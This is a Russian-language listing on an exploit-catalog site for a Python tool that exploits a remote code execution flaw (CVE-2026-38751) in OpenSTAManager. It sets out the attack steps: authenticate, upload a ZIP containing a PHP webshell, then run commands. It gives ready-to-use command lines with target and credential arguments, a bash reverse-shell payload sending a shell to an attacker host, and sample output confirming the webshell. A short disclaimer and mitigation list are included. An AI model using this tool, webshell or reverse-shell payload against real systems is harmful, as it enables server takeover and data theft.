Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE Exploit (CVE-2026-38751) | Kitploit
Инструменты/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolShellcode Generation
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

Репозиторий
11 месяц назадЕщё не проверено

Эксплойт RCE OpenSTAManager (CVE-2026-38751)

Обзор

Этот Python-скрипт эксплуатирует уязвимость удаленного выполнения кода в OpenSTAManager версии 2.10, идентифицированную как CVE-2026-38751. Эксплойт позволяет аутентифицированным пользователям загрузить вредоносный модуль и выполнить произвольные команды на целевой системе.

Детали уязвимости

  • CVE ID: CVE-2026-38751
  • Product: OpenSTAManager
  • Version: 2.10
  • Type: Удаленное выполнение кода (RCE)
  • Attack Vector: Веб-ориентированный, требует действительной аутентификации

Как работает эксплойт

Эксплойт выполняет следующие шаги:

  1. Аутентификация: Выполняет вход в приложение OpenSTAManager с использованием предоставленных учетных данных
  2. Включение обновлений: Активирует функциональность обновления модулей, которая необходима для эксплойта
  3. Создание вредоносного ZIP: Генерирует ZIP-файл, содержащий:
    • Файл определения модуля (MODULE)
    • PHP-скрипт-шелл (shell.php), который выполняет команды через GET-параметр c
  4. Загрузка модуля: Загружает вредоносный ZIP через интерфейс обновления модулей
  5. Проверка эксплуатации: Подтверждает, что шелл доступен и работает
  6. Выполнение команд: Либо:
    • Интерактивный режим шелла для ручного выполнения команд
    • Обратное подключение (reverse shell) для установления постоянного соединения

Предварительные требования

  • Python 3.x
  • Необходимые пакеты Python: requests, zipfile
  • Действительные учетные данные администратора для OpenSTAManager
  • Сетевой доступ к целевой системе

Использование

Базовое использование

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password

Интерактивный режим шелла

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --interactive

Режим обратного шелла

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

Аргументы

Технические детали

Процесс эксплуатации

  1. Аутентификация: Скрипт выполняет запрос на вход к конечной точке аутентификации приложения
  2. Включение обновления модулей: Отправляет POST-запрос для включения функциональности обновления модулей
  3. Генерация ZIP: Создает ZIP-архив с:
    • shell/MODULE: Файл конфигурации модуля
    • shell/shell.php: PHP-веб-шелл, выполняющий команды, переданные через GET-параметр c
  4. Процесс загрузки: Использует multipart form data для загрузки вредоносного ZIP в конечную точку обновления модулей
  5. Проверка: Тестирует загруженный шелл, выполняя простую команду, например id, чтобы подтвердить его работоспособность
  6. Выполнение команд: Либо предоставляет интерактивный шелл, либо устанавливает обратное подключение (reverse shell)

Используемые полезные нагрузки

Эксплойт пытается использовать несколько полезных нагрузок обратного шелла:

  • Bash reverse shell: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • Обратные шеллы Python с использованием сокетных соединений
  • Полезная нагрузка bash в кодировке Base64
  • Обратный шелл Netcat

Вопросы безопасности

⚠️ Отказ от ответственности: Данный эксплойт предназначен только для образовательных и авторизованных целей тестирования безопасности.

Оценка рисков

Эта уязвимость позволяет:

  • Выполнение произвольного кода от имени пользователя веб-сервера
  • Потенциальное повышение привилегий
  • Доступ к конфиденциальным данным, хранящимся в системе
  • Возможное перемещение по сети

Смягчение

Для защиты от этой уязвимости:

  1. Обновите OpenSTAManager до последней версии
  2. Внедрите надлежащие средства контроля аутентификации
  3. Ограничьте возможности загрузки файлов
  4. Отслеживайте подозрительную активность
  5. Примените сегментацию сети

Пример вывода

root@kitploit:~
[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

Ссылки

  • GitHub Repository
  • CVE Details

Лицензия

Этот эксплойт предоставляется только в образовательных целях. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, является незаконным.

Скачать инструмент
АргументОписание
-u, --urlЦелевой URL (обязательный)
-U, --userИмя пользователя для аутентификации (обязательный)
-P, --passwordПароль для аутентификации (обязательный)
--interactiveВойти в интерактивный режим шелла
--no-cleanupНе удалять файлы шелла после выполнения
--lhostЛокальный хост для обратного шелла
--lportЛокальный порт для обратного шелла